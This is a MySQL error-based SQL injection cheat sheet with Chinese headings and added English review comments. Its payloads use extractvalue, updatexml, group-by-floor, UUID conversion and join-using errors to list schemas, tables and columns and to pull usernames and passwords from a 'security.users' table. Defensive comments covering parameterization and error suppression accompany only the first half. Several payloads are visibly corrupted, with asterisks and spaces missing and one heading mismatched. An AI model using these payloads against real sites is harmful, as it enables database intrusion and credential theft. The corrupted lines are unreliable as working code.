-- Error-based probe (MySQL): the aggregated schema names are handed to gtid_subtract() as its first
-- argument, presumably so that the server's "malformed GTID set" style error echoes them back to the
-- caller — confirm against the target engine version, the page does not state it.
-- Defensive reading: this only works when caller-controlled text reaches the statement unbound and raw
-- database error text is returned to the client; bind values as parameters and return generic errors.
select gtid_subtract((select group_concat(schema_name) from information_schema.schemata),1);
uuid
uuid_to_bin()
1
-- Error-based probe via UUID_TO_BIN(): the aggregated subquery result is passed where a UUID string is
-- expected, the assumption being that the conversion error surfaces the value (hedged; verify on the
-- target version). The `id=-1 union` shape depends on `id` being interpolated into the statement
-- unbound — a parameterized query closes this vector regardless of the function used.
-- NOTE(review): `-1unionselect1` has lost its spaces, most likely a copy/rendering artefact.
SELECT*from table1 where id=-1unionselect1,UUID_TO_BIN((select group_concat(schema_name) from information_schema.schemata));
bin_to_uuid()
1
-- Same pattern as the UUID_TO_BIN() probe above, using BIN_TO_UUID(): a non-binary-UUID argument is
-- expected to raise an error that carries the subquery result (hedged; engine-version dependent).
-- Detection signal for defenders: conversion errors whose message contains schema names or other
-- catalogue data reaching the application/client.
-- NOTE(review): `-1unionselect1` has lost its spaces, most likely a copy/rendering artefact.
SELECT*from table1 where id=-1unionselect1,BIN_TO_UUID((select group_concat(schema_name) from information_schema.schemata));
join using()注列名
1
-- Column-name disclosure attempt (see "join using()" heading above): table1 is joined to a copy of
-- itself with no join condition, so the derived table c would hold every column name twice; the
-- expectation is a duplicate-column error naming the first colliding column (hedged — depends on the
-- engine's derived-table rules). No data is read; the leak is the error text itself.
select*from(select*from table1 a join (select*from table1)b)c;
1
-- Second step of the column-name probe: USING(id) folds the already-known column so the error, if any,
-- names the next colliding column. For defenders the signal is a client producing a sequence of
-- duplicate-column errors against the same table.
select*from(select*from table1 a join (select*from table1)b using(id))c;
1
-- Third step of the column-name probe with two known columns folded via USING(id,value).
-- Mitigation is the same as for the earlier steps: do not let caller-controlled text reach the
-- statement unbound, and do not relay database error messages to clients.
select*from(select*from table1 a join (select*from table1)b using(id,value))c;
空间函数Geohash
version [5.7, ?)
ST_LatFromGeoHash
1
-- Spatial-function error probe (heading states MySQL 5.7 and later): an invalid geohash string in place
-- of <payload> is expected to be echoed in the error text (hedged). <payload> is a placeholder, not a
-- runnable input.
-- NOTE(review): the heading above names ST_LatFromGeoHash but this line calls ST_LongFromGeoHash —
-- likely a copy/paste slip in the page.
select ST_LongFromGeoHash(<payload>);
ST_LongFromGeoHash
1
-- Spatial-function error probe using ST_LongFromGeoHash(): same shape as the ST_LatFromGeoHash entry.
-- <payload> is a placeholder; the technique relies on detailed error text being returned to the caller,
-- so generic error handling at the application layer removes the channel.
select ST_LongFromGeoHash(<payload>);
ST_PointFromGeoHash
1
-- Spatial-function error probe using ST_PointFromGeoHash(); the second argument is the SRID the page
-- supplies as a literal 1. <payload> is a placeholder. Same mitigation as the other spatial probes:
-- parameterize inputs and suppress raw database error output.
select ST_PointFromGeoHash(<payload>, 1);
xpath
extractvalue()
数据库
1
?id=1' and extractvalue(1, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e))--+
数据表
1
?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))--+
字段
1
?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e))--+
数据
1
?id=1' and extractvalue(1, concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from security.users limit 7,1),0x7e))--+
updatexml()
数据库
1
?id=1' and updatexml(1, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1)--+
数据表
1
?id=1' and updatexml(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)--+
字段
1
?id=1' and updatexml(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1)--+
数据
1
?id=1' and updatexml(1, concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from security.users limit 7,1),0x7e),1)--+
group by floor
version 5.x
利用外键重复来产生报错，这个报错注入在 MySQL 8.x 的版本中不存在。
数据库版本
1
?id=1' union select 1,count(),concat(0x7e,(select database()),0x7e,floor(rand(0)2))a from information_schema.schemata group by a--+
数据库
1
?id=1' union select 1,count(),concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
数据表
1
?id=1' union select 1,count(),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
字段
1
?id=1' union select 1,count(),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 5,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
数据
1
?id=1' union select 1,count(),concat(0x7e,(select password from security.users limit 2,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+